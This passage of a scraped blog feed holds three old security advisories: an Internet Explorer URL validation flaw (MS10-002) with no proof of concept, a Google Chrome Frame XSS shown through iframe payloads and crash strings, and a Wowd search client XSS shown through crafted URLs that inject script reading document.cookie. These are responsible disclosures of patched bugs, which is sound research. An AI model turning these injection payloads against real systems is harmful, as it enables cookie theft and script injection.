width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/02/internet-explorer-7-8-url-validation.htmltag:blogger.com,1999:blog-9011578.post-23631335555038559282010-01-21T19:17:00.008+01:002010-01-24T12:08:14.698+01:002010-01-24T12:08:14.698+01:00###################################<br />Internet explorer 6 7 and 8 URL Validation Vulnerability<br />Vendor :http://www.Microsoft.com<br />Vendor notify:YES vendor confirmed :YES<br />REF Bulletin:<a href="http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx" target="_blank">MS10-002</a><br />#########################################<br /><br />A remote code execution vulnerability exists in the way that Internet Explorer incorrectly validates input. An attacker could exploit the vulnerability by constructing a specially crafted URL. When a user clicks the URL, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.<br /><br /> To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see <a href="http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx" target="_blank">MS10-002</a> and CVE-2010-0027.<br /><br />No more details at this time I have a PoC But At this moment it, is private.<br /><br />Time Line for this vulnerability:<br /><br />discovered 05-11-2009<br />Reported to vendor 15-11-2009<br />Vendor response:15-11-2009<br />vendor accepts in case manager 19-11-2009<br />vendor patch 21-01-2010<br /><br />#################€nd#############<br /><br />Thnx to estrella To be mi ligth<br />Thnx To icar0 & sha0 from Badchecksum<br />Thnx To Google security Team For support<br />Thnx To MSRC for Support<br /><br />atentamente:<br />Security Research & Analisys.<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-2363133555503855928?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/NzlbgNPTSgnomWcL-ao8oNZgytA/0/da"><img src="http://feedads.g.doubleclick.net/~a/NzlbgNPTSgnomWcL-ao8oNZgytA/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/NzlbgNPTSgnomWcL-ao8oNZgytA/1/da"><img src="http://feedads.g.doubleclick.net/~a/NzlbgNPTSgnomWcL-ao8oNZgytA/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/tfHZ_n_Sx5A" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/01/internet-explorer-6-7-8-url-validation.htmltag:blogger.com,1999:blog-9011578.post-61647242483443909592009-11-19T13:04:00.005+01:002009-11-19T13:20:52.636+01:002009-11-19T13:20:52.636+01:00#####################################<br />Google Chrome Frame null domain XSS<br />vendor url:http://www.google.com/chromeframe<br />vendor changelog:http://googlechromereleases.blogspot.com/<br />2009/11/google-chrome-frame-update-bug-fixes.html<br />Advisore:http://lostmon.blogspot.com/<br />2009/11/google-chrome-frame-null-domain-xss.html<br />Vendor notify:yes Exploit available:YES<br />######################################<br /><br /><br />######################<br />Description by vendor<br />######################<br /><br />Google Chrome Frame is a free plug-in for Internet Explorer. <br />Some advanced web apps, like Google Wave, use Google Chrome <br />Frame to provide you with additional features and better performance. <br /><br />Google Chrome Frame is an early-stage open source <br />plug-in that seamlessly brings Google Chrome's open<br />web technologies and speedy JavaScript engine to <br />Internet Explorer.<br /><br />################<br />version Afected<br />################<br /><br />4.0.223.9 (Official Build 29618)<br />WebKit: 532.3<br />V8: 1.3.16<br />User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)<br />AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.9 Safari/532.3<br /><br />Not afected version:<br /><br />4.0.245.1 (Official Build 31970)<br />WebKit: 532.5<br />V8: 1.3.18.6<br />User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) <br />AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.245.1 Safari/532.5<br /><br />you can find aditional information here:<br />http://googlechromereleases.blogspot.com/<br />2009/11/google-chrome-frame-update-bug-fixes.html<br /><br />#####################<br />Cross Site scripting<br />#####################<br /><br />Create a html document and some to test =><br /><br />&lt;iframe src="javascript:alert(1)&gt;&lt;/iframe&gt;<br /> => this opens the iframe and execute the alert<br />( this is correct)<br /><br />&ltiframe src="cf:javascript:alert(1)&gt;&lt;/iframe&gt; <br />this does not work , not show the alert ( correct)<br /><br />and here is the flaw =><br />&ltiframe src="cf:view-source:javascript:alert(1)&gt;&lt;/iframe&gt;<br /><br />This show & executed the alert it works on local & remote <br />scenario or via address bar too.<br />This bypassed cross-origin protections !!!<br /><br />For google chrome browser test this<br />at the address bar =><br />view-source:javascript:alert(1)<br /><br />this execute the alert but recently google has made changes<br />in about:blank page and this issue is only exploitable<br />via address bar ,not in a iframe or frame or html document<br />so for that i think that this issue isn´t exploitable in a<br />remote scenario.<br /><br />###########<br />crashes<br />###########<br /><br />cf:view-source:about@: crash<br />cf:about@: => crashing the tab<br /><br />##########<br />Solution<br />############<br /><br />Google has automatic release a new version<br />of Chrome Frame 4.0.245.1 (Official Build 31970)<br />and this version is not afected.<br /><br />#################€nd#############<br /><br />Thnx to estrella To be mi ligth<br />Thnx To icar0 & sha0 from Badchecksum<br />Thnx To Google security Team<br /><br />atentamente:<br />Security Research & Analisys.<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-6164724248344390959?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/gj7MXsMXHKo1-L6OwWPtYy1RQWs/0/da"><img src="http://feedads.g.doubleclick.net/~a/gj7MXsMXHKo1-L6OwWPtYy1RQWs/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/gj7MXsMXHKo1-L6OwWPtYy1RQWs/1/da"><img src="http://feedads.g.doubleclick.net/~a/gj7MXsMXHKo1-L6OwWPtYy1RQWs/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/6eCs-ZVWVuE" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2009/11/google-chrome-frame-null-domain-xss.htmltag:blogger.com,1999:blog-9011578.post-1965417791411566522009-10-27T19:39:00.004+01:002009-11-03T10:45:32.930+01:002009-11-03T10:45:32.930+01:00##########################################<br />Wowd search client multiple variable xss<br />Vendor URL: http://www.wowd.com/<br />Advisore:http://lostmon.blogspot.com/2009/10/<br />wowd-search-client-multiple-variable.html<br />Vendor notify:yes exploit available:yes<br />##########################################<br /><br />################<br />What is Wowd?<br />################<br /><br />Wowd is a real-time search engine for discovering <br />what's popular on the web right now.<br /><br />In essence, the company has made a peer-to-peer <br />search engine powered by what other Wowd users <br />are looking at online rather than studying and <br />ranking sites based on an arcane link structure. <br />Taking search and breaking it into millions of <br />tiny pieces all run by individual users who have<br />downloaded the Wowd client completely changes <br />the operation -- and economics -- of a search <br />engine. The more times that someone in the Wowd<br />crowd clicks on a link within a recent time <br />frame, the higher the link's ranking.<br /><br /><br />##########################<br />Vulnerability description<br />##########################<br /><br />Wowd client contains a flaw that allows a remote<br />cross site scripting attack.This flaw exists because<br />the application does not validate In the URI dialog<br />'sortby' 'tags' and 'ctx' variables upon submision to<br />'index.html' script. This could allow a user to create <br />a specially crafted URL that would execute arbitrary <br />code in a user's browser within the trust relationship <br />between the browser and the server,leading loss of integrity.<br /><br />This issue can be dangerous , because if you are running<br />Wowd client , you have all of this vulnerabilities because<br />this issue can be exploited accross all browsers,<br />include ie8 with the XSS filter ( WoW ! )<br /><br />#################<br />Versions<br />################·<br /><br />Wowd client 1.3.0 vulnerable<br />Wowd client 1.3.1 Not vulnerable<br /><br /><br />#################<br />SOLUTION<br />#################<br /><br />Upgrade to version 1.3.1 or higher, as it has been <br />reported to fix this vulnerability. An upgrade is <br />required as there are no known workarounds.<br /><br /><br />###################<br />Proof of Concept.<br />###################<br /><br />#############<br />Test<br />#############<br /><br />I test it in ie8, firefox 3.5.3 and safari 4<br /><br />in all cases the xss is executed include ie8 with xss filter :D<br /><br />a remote user can compose a html document<br />with a iframe and this source for the iframe:<br /><br />http://localhost:8101/wowd/index.html?search&sortby=rank%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E<br /><br />the browser executes the xss ,if you access directly to <br />this url the xss is executed too.<br /><br />aditionaly wen wowd show his results , we have a functionality<br />to add "tags" to a url.<br /><br />Example:<br /><br />http://localhost:8101/wowd/index.html?search&query=a&<br />sortby=rank&tags=english|S0B0707656E676C6973680D02<br /><br />this shows a indexed search with tag 'english' we can add a <br />crafted tag that allow to execute a xss like:[tag]|[token]<br /><br />example:<br /><br />http://localhost:8101/wowd/index.html?search&query=a<br />&sortby=rank&tags=english|S0B0707656E676C6973680D02,<br />%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E|S0B0707656E676C6973680D02<br /><br />and it executed the xss in the tags labels.<br /><br />ctx variable is also afected too<br /><br />http://localhost:8101/wowd/index.html?search&page=2&q=<br />&sortby=rank&tags=news|S0807046E6577730D02&ctx=1995393737681%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E<br /><br /><br />############## €nd ###################<br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<br />----------------------------------------------<br />Browser: Internet Explorer 8 (Windows)<br />Browser: Firefox 3.5 (Windows)<br />Browser: Safari 4 (Windows)<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-196541779141156652?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/PK33TsgG1w_HJA6Rc10HvEfOd1A/0/da"><img src="http://feedads.g.doubleclick.net/~a/PK33TsgG1w_HJA6Rc10HvEfOd1A/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/PK33TsgG1w_HJA6Rc10HvEfOd1A/1/da"><img src="http://feedads.g.doubleclick.net/~a/PK33TsgG1w_HJA6Rc10HvEfOd1A/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/Lm9J1JZnDTc" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2009/10/wowd-search-client-multiple-variable.html